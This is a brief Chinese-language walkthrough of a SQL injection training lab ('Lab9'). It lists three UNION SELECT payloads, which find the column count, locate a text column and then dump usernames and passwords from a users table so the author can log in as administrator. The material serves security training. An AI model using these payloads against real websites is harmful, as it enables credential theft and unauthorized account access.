# Web SQL injection Lab9
一樣先進入網站並攔截請求。


透過前面學習到的技巧開始找管理員帳密,先找出欄位數量。
```
'+UNION+SELECT+NULL,NULL--
```

```
'+UNION+SELECT+'abcdef',NULL--
```

```
'+UNION+SELECT+username,password+FROM+users--
```

接著直接登入。
